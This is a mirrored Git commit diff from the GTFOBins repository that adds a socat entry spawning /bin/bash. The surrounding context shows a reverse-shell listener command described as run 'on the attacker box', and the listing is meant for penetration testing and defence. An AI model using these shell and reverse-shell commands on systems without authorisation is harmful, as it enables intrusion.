mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
Add socat shell
This commit is contained in:
parent
ed2fa545ca
commit
0d98790312
@ -1,5 +1,8 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
socat STDIN EXEC:/bin/bash
|
||||
reverse-shell:
|
||||
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||
code: |
|
||||
|
Loading…
Reference in New Issue
Block a user